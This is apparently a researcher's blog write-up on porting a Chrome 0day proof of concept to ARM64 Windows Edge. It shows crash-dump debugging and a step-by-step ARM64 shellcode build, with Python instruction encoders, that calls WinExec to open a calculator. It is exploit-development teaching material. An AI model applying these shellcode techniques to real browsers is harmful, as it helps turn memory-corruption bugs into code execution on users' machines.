Given a recent Chrome 0day exploit, it may be worthwhile investigating if it might be exploitable on the ARM64 architecture.
Reproducing the crash
The first thing to check out is just opening the HTML file as-is on an ARM64 Windows VM. I'm using an M1 Mac Mini with Parallels for my investigation.
Well this is promising! It sure seems like it's attempting to run code that it doesn't understand, which is predictable, as an ARM CPU definitely shouldn't grok x86 or x86_64 instructions. Let's look at the beginning of our PoC exploit file:
Could it really be as easy as plopping in our own ARM shellcode to replace the original shellcode? Let's find out...
Investigating crash details
Attaching a debugger
Chrome-based browsers are tricky to attach a debugger to. When you open up a new tab, the browser spawns a new process to do the work of rendering the page. If you run windbg.exe with the -o option, it should debug child processes.
However, in my testing, I couldn't get a working Edge process when running it under windbg. I could press g a couple of times to continue the presumed child processes, but eventually I'd reach a state where nothing was running, according to windbg:
Similarly, if Edge is run with the --single-process option, it does end up spawning chrome, but it crashes immediately upon attempting to do anything. It is reported that --single-process isn't supported, so perhaps this isn't a surprise?
Looking at DMP files
Luckily, Edge will automatically create DMP files in the C:\Users\test\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports directory if crashes are encountered. As long as Windbg is registered as the handler for DMP files (run windbg -IA to configure this), you can just double-click any DMP file to open the crash details.
By default, this is not the state of the machine at the crash! It's the state after the crash handler and minidump code have run. But we can simply click on !analyze -v to get the state of the actual crash.
With this information, we can disassemble the instructions at the pc register (View → Disassembly → Paste in 000072fea0b01000 (the value of PC)):
The first 4 bytes of our shellcode are 0xFC, 0x48, 0x83, 0xE4, so the fact that Edge is attempting to execute the bytes e48348fc is a good sign! (Keep in mind that aarch64 Windows is little-endian, so reverse your byte ordering.)
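As a quick sanity check of that byte ordering, here is a minimal Python sketch (not part of the original PoC; the variable names are made up for illustration) that reads the four shellcode bytes the way a little-endian CPU fetches a 32-bit instruction word:

```python
import struct

# First four bytes of the original x86_64 shellcode, in file order.
shellcode_prefix = bytes([0xFC, 0x48, 0x83, 0xE4])

# "<I" means little-endian unsigned 32-bit: the first byte in memory
# becomes the least-significant byte of the instruction word.
(word,) = struct.unpack("<I", shellcode_prefix)

print(f"{word:08x}")  # e48348fc
```

The printed word matches what the debugger shows at the PC, which is why the bytes appear reversed.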
Testing our ARM64 shellcode
We've confirmed above that ARM64 Edge is attempting to execute the bytes that we provide. How about doing something useful?
An infinite loop
It's not terribly useful, but let's warm up with some pieces of code that are obviously executing, which may end up being useful in our investigation.
https://disasm.pro/ can be useful if you know which instructions you want to use and need the bytes that encode them, or vice versa.
The simplest infinite loop is the following instruction:
Which will jump to an offset of 0 bytes, i.e. back to the same instruction. Using disasm.pro, we see that it is encoded as 00 00 00 14.
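If you'd rather not depend on an online assembler, the encoding of an unconditional branch is simple enough to compute by hand. The sketch below is my own helper (`encode_b` is a hypothetical name, not from any library): the A64 `B` instruction is the opcode bits 0x14000000 OR'd with a signed 26-bit offset counted in 4-byte instructions.

```python
def encode_b(offset: int) -> bytes:
    """Encode AArch64 `b <pc + offset>` as little-endian bytes.

    `offset` is in bytes, relative to the branch itself, and must be a
    multiple of 4 within +/-128 MiB.
    """
    if offset % 4 != 0:
        raise ValueError("branch offset must be a multiple of 4")
    if not -(1 << 27) <= offset < (1 << 27):
        raise ValueError("branch offset out of range")
    imm26 = (offset >> 2) & 0x3FFFFFF  # two's-complement, 26 bits
    word = 0x14000000 | imm26
    return word.to_bytes(4, "little")


print(encode_b(0).hex(" "))   # 00 00 00 14  (branch to self)
print(encode_b(-4).hex(" "))  # ff ff ff 17  (branch back one instruction)
```

Note that a last byte of 17 only shows up for backward branches, where the sign bits of the offset spill into the top byte.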
Let's update our PoC:
Now we can open our PoC file:
We can't attach to Edge before it reaches the crash. And even if we could, ARM64 Windows doesn't technically support the M1 chip, so we can't viably trace through functions. Our analysis is therefore limited to viewing a DMP file after the fact. If we can trigger a crash at an arbitrary point in our shellcode, we get a static snapshot of what the computer was doing at that point.
The simplest way to crash is to dereference an invalid memory address. Let's look again at our crash details:
We want a register that we're not using and that points somewhere invalid. x10 fits this bill (as do quite a few others). We're also not using x11, so the following instruction will trigger a crash:
ldr x11, [x10]
This will dereference the x10 register and place the value in x11. Since x10 holds 0x386, which is not a valid address, this will crash. Let's test it out.
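To get the bytes for this crashing instruction into the shellcode array, a small encoder is enough. This is a sketch under the assumption that we only need the 64-bit `LDR Xt, [Xn, #imm]` form with an unsigned, 8-byte-scaled offset; `encode_ldr_x` is a name I made up for illustration.

```python
def encode_ldr_x(rt: int, rn: int, offset: int = 0) -> bytes:
    """Encode AArch64 `ldr x<rt>, [x<rn>, #offset]` (64-bit, unsigned offset)."""
    if not (0 <= rt <= 31 and 0 <= rn <= 31):
        raise ValueError("register numbers must be 0..31")
    if offset % 8 != 0 or not 0 <= offset <= 0xFFF * 8:
        raise ValueError("offset must be a multiple of 8 in 0..32760")
    imm12 = offset // 8  # the offset is stored scaled by the access size
    word = 0xF9400000 | (imm12 << 10) | (rn << 5) | rt
    return word.to_bytes(4, "little")


# ldr x11, [x10]
print(encode_ldr_x(11, 10).hex(" "))  # 4b 01 40 f9
```

Those four bytes can be dropped in wherever we want execution to stop and leave a dump behind.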
In the browser:
Good! Now in the DMP file:
Success! This is a useful primitive to have. If our shellcode isn't working, we can place the crashing instruction wherever we like, and we can inspect the register values, stack, or other memory states.
Doing something useful with our shellcode
Simple shellcode in Windows often calls WinExec(). It takes two arguments:
- LPSTR lpCmdLine
- UINT uCmdShow
Our simple "pop" calc shellcode will just use calc for the first argument, and 1 as the second (for a normal window).
aarch64 calling convention
If we look at old example shellcode for popping calc, we can see that this particular example:
- push 0
- push "
- push pointer to "
- Call hard-coded address of WinExec()
From this, we can see that arguments to function calls on x86 are stack-based. Argument 0 is what you'd like to run (calc), and argument 1 is the window property (0).
We can use this structure as our starting point for our shellcode, but it's important to realize that the aarch64 calling convention is register based. That is, arguments are passed in X0, X1, X2, etc...
Where to put our string
While we aren't passing our "calc" on the stack, it seemed reasonable to use the stack as the place where our string lives. ARM doesn't have PUSH and POP, so you'll have to implement your own equivalent.
The problem with using the stack is that the stack pointer needs to be 16-byte aligned at all times. Otherwise, the app will crash. As outlined in the above article, a workaround for this is to use a register other than SP, which allows you to have whatever alignment you like. Just to keep things simple, let's go down this path:
Setting up our "shadow" stack
Let's copy SP to another register to use:
Let's look at our self-triggered crash dump now:
Here we can see that X9 and SP both point to 000000a267bfdac0. So our shellcode instruction worked! If we keep that crashing instruction at the end of our shellcode, we can check each addition to our shellcode to confirm that it is doing what we expect it to do.
Getting pointer to "calc.exe\0"
Here we have four main operations:
- Put "calc.exe" on our "stack"
- Put a null on our "stack"
- Copy pointer to fake stack (X9) to X0
- Subtract 16 from our pointer so that we point to the beginning of "calc.exe"
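Conveniently, "calc.exe" is exactly 8 bytes, so it fits in a single 64-bit register. The sketch below assumes the string is first built in a register as an immediate (16 bits at a time) and then stored to the fake stack; that is my assumption for illustration, and the variable names are hypothetical.

```python
text = b"calc.exe"
assert len(text) == 8  # exactly one 64-bit register's worth

# Little-endian: the first character ends up in the lowest byte, so
# storing the register to memory lays the string out in reading order.
value = int.from_bytes(text, "little")

# Split into 16-bit pieces, lowest first, as immediate-load
# instructions would consume them.
chunks = [(value >> shift) & 0xFFFF for shift in (0, 16, 32, 48)]

print(hex(value))                # 0x6578652e636c6163
print([hex(c) for c in chunks])  # ['0x6163', '0x636c', '0x652e', '0x6578']
```

The second 8-byte slot is simply zero, which gives the string its null terminator and explains why the pointer is adjusted by 16.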
Put 1 into X1
Our second argument to WinExec() should simply be 1 to get a normal window for calc.exe.
That's it. No fancy stack or fake-stack operations. Just move the number 1 into X1.
Get pointer to WinExec()
Just to start simple, we'll use a static address for WinExec(). This isn't viable in the real world due to ASLR, but we can cheat to start out. Attach to a msedge.exe process and ask windbg where WinExec() lives. It'll be valid until Windows reboots.
Here we can see that WinExec() lives at 6fde9ff0. But wait! That's just a 32-bit address! I don't believe it, so let's try Windbg Preview to get a second opinion:
Well that's better! I can see that WinExec() actually lives at 00007ffc`6fde9ff0. But wait! Windbg Preview is disassembling the ARM64 instructions as if they were x86_64! I get the impression that ARM64 Windows is very much a work in progress...
But we at least have the address of what we want to call:
Here we are constructing the address 00007ffc`6fde9ff0 two bytes at a time, remembering that we're on a little-endian system. That is, start at the end of the address (the least-significant 16 bits) and work your way to the beginning.
- MOVZ 0x9FF0 into X8
X8: 00000000 00009FF0
- MOVK 0x6FDE into X8, shifted left 16 bits (the other bits are kept)
X8: 00000000 6FDE9FF0
- MOVK 0x7FFC into X8, shifted left 32 bits (the other bits are kept)
X8: 00007FFC 6FDE9FF0
At this point we're done. I originally moved zeros into the leading 2 bytes of the register as well, but then discovered that this is redundant, as the first MOVZ instruction already zeroed out the rest of the register.
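Since the WinExec() address changes on every reboot, it's handy to regenerate this instruction sequence rather than hand-assemble it each time. The following is a rough sketch, assuming the 64-bit MOVZ/MOVK encodings (base words 0xD2800000 and 0xF2800000); `build_address` and `simulate` are hypothetical helper names. The simulator is only there to confirm that the generated instructions rebuild the original value.

```python
MOVZ_X = 0xD2800000  # movz xd, #imm16, lsl #(16*hw): zeroes the other bits
MOVK_X = 0xF2800000  # movk xd, #imm16, lsl #(16*hw): keeps the other bits


def build_address(rd: int, address: int):
    """Return [(assembly text, 32-bit encoding)] that loads `address` into x<rd>."""
    insns = []
    for hw in range(4):
        imm16 = (address >> (16 * hw)) & 0xFFFF
        if hw == 0:
            base, name = MOVZ_X, "movz"
        elif imm16 == 0:
            continue  # the initial MOVZ already cleared these bits
        else:
            base, name = MOVK_X, "movk"
        word = base | (hw << 21) | (imm16 << 5) | rd
        insns.append((f"{name} x{rd}, #0x{imm16:x}, lsl #{16 * hw}", word))
    return insns


def simulate(insns) -> int:
    """Apply the encoded MOVZ/MOVK sequence to a register that starts at 0."""
    reg = 0
    for _, word in insns:
        shift = 16 * ((word >> 21) & 0x3)
        imm16 = (word >> 5) & 0xFFFF
        if word & 0x20000000:  # opc bit that distinguishes MOVK from MOVZ
            reg = (reg & ~(0xFFFF << shift)) | (imm16 << shift)
        else:
            reg = imm16 << shift
    return reg


insns = build_address(8, 0x00007FFC6FDE9FF0)
for text, word in insns:
    print(f"{word.to_bytes(4, 'little').hex(' ')}    {text}")
```

For the address above this emits three instructions, skipping the all-zero top 16 bits for the same reason described in the text.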
Calling our function and then hanging.
A standard function call on ARM64 uses BLR X8: Branch with Link to Register, with X8 holding the function pointer.
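On AArch64, the register-indirect call instruction is BLR, which stores the return address in X30 and branches to the address in the named register. A minimal sketch of its encoding (`encode_blr` is a made-up helper name):

```python
def encode_blr(rn: int) -> bytes:
    """Encode AArch64 `blr x<rn>` as little-endian bytes."""
    if not 0 <= rn <= 30:
        raise ValueError("register number must be 0..30")
    word = 0xD63F0000 | (rn << 5)
    return word.to_bytes(4, "little")


# blr x8
print(encode_blr(8).hex(" "))  # 00 01 3f d6
```

Following this with the branch-to-self instruction keeps the renderer from running off into whatever bytes come after the shellcode once WinExec() returns.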
Putting it all together:
And in action on an ARM64 Windows system:
Adding ASLR support
In Part 2 of this exercise, we determine dynamically in the shellcode where WinExec() actually lives, so that it works on all ARM64 Windows versions, rather than on just one example boot of my one VM (Windows re-shuffles ASLR at boot time, as opposed to at execution time as Linux does).